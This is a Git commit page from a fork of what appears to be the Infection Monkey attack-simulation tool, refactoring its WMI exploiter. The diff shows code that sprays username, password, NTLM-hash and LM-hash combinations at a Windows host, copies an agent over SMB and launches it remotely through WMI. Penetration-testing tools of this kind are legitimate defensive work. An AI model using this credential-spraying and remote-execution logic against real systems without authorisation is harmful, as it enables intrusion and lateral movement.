p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: decouple wmiexec.py from WormConfig object

This commit is contained in:
vakarisz 2022-03-08 14:56:22 +02:00
parent d7e222c8a8
commit c932a19b47
3 changed files with 29 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
monkey/infection_monkey/config.py
View File

@ -151,20 +151,6 @@ class Configuration(object):
""" """
return product(self.exploit_user_list, self.exploit_ssh_keys) return product(self.exploit_user_list, self.exploit_ssh_keys)
def get_exploit_user_password_or_hash_product(self):
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
cred_list.append(cred)
return cred_list
@staticmethod @staticmethod
def hash_sensitive_data(sensitive_data): def hash_sensitive_data(sensitive_data):
""" """

1
monkey/infection_monkey/exploit/smbexec.py
View File

@ -52,6 +52,7 @@ class SmbExploiter(HostExploiter):
logger.info("Can't find suitable monkey executable for host %r", self.host) logger.info("Can't find suitable monkey executable for host %r", self.host)
return False return False
# TODO extract the method in wmiexec.py
creds = self._config.get_exploit_user_password_or_hash_product() creds = self._config.get_exploit_user_password_or_hash_product()
exploited = False exploited = False

34
monkey/infection_monkey/exploit/wmiexec.py
View File

@ -2,13 +2,14 @@ import logging
import ntpath import ntpath
import socket import socket
import traceback import traceback
from typing import List from itertools import product
from typing import List, Mapping
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey from infection_monkey.exploit.tools.helpers import get_monkey_depth
from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
@ -28,7 +29,7 @@ class WmiExploiter(HostExploiter):
@WmiTools.dcom_wrap @WmiTools.dcom_wrap
def _exploit_host(self): def _exploit_host(self):
creds = self._config.get_exploit_user_password_or_hash_product() creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in creds: for user, password, lm_hash, ntlm_hash in creds:
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash]) creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
@ -83,20 +84,20 @@ class WmiExploiter(HostExploiter):
password, password,
lm_hash, lm_hash,
ntlm_hash, ntlm_hash,
self._config.smb_download_timeout, self.options["smb_download_timeout"],
) )
if not remote_full_path: if not remote_full_path:
wmi_connection.close() wmi_connection.close()
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
cmdline = DROPPER_CMDLINE_WINDOWS % { cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
self._config.dropper_target_path_win_32, self.options["dropper_target_path_win_64"],
) )
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % { cmdline = MONKEY_CMDLINE_WINDOWS % {
@ -139,6 +140,27 @@ class WmiExploiter(HostExploiter):
return False return False
def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List:
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(
credentials["exploit_user_list"], credentials["exploit_password_list"], [""], [""]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], [""], credentials["exploit_ntlm_hash_list"]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], credentials["exploit_lm_hash_list"], [""]
):
cred_list.append(cred)
return cred_list
def _get_credential_string(creds: List) -> str: def _get_credential_string(creds: List) -> str:
cred_strs = [ cred_strs = [
(creds[0], "username"), (creds[0], "username"),